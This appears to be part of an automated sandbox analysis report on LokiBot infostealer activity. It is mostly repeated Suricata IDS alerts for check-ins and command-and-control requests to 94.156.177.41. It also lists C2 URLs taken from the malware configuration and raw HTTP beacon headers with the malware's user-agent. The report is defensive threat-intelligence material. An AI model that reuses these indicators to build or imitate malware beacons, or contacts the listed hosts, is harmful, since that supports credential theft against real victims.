Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49896 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49896 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49906 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49896 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49900 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49900 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49900 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49906 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49896 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49896 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49900 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49900 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49896
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49949 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49873 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49885 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49885 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49867 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49873 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49885
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49949 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49841
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49888
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49906 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49867 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49867 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49949 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49949 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49949 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49867 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49867 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49949
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49906
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49917
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49873 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49900
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49924 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49978 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49929 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49960 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49960 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49960 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49978 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49924 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49973 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49924 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49968 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49978 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49968 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49962
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49968 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49929 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49978 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49937 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49924 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49873
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49924 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49929 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49935 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49935 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49937 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49960 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49968 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49978 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49867
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49973 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49924
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49929 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49929 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49968 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49973 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49960 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49935 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49968
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50014 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50014 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49973 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50014 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49973 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49929
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49960
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50032 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50014 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:50000
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49935 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49935 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50032 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50032 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:50014 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49937 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49978
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49935
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49879 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:50014
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49879 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49879 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49937 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49879 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49879 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49879
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49937 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49990
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49943 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49994 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49943 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:50020
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49943 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49994 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49994 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49943 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49994 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49994 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49937
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49943 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49943
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49994
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49911
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49973
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49954
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49984
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50032 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:50032 -> 94.156.177.41:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs:

Source: Joe Sandbox View

IP Address: 94.156.177.41 94.156.177.41

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 188Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 188Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
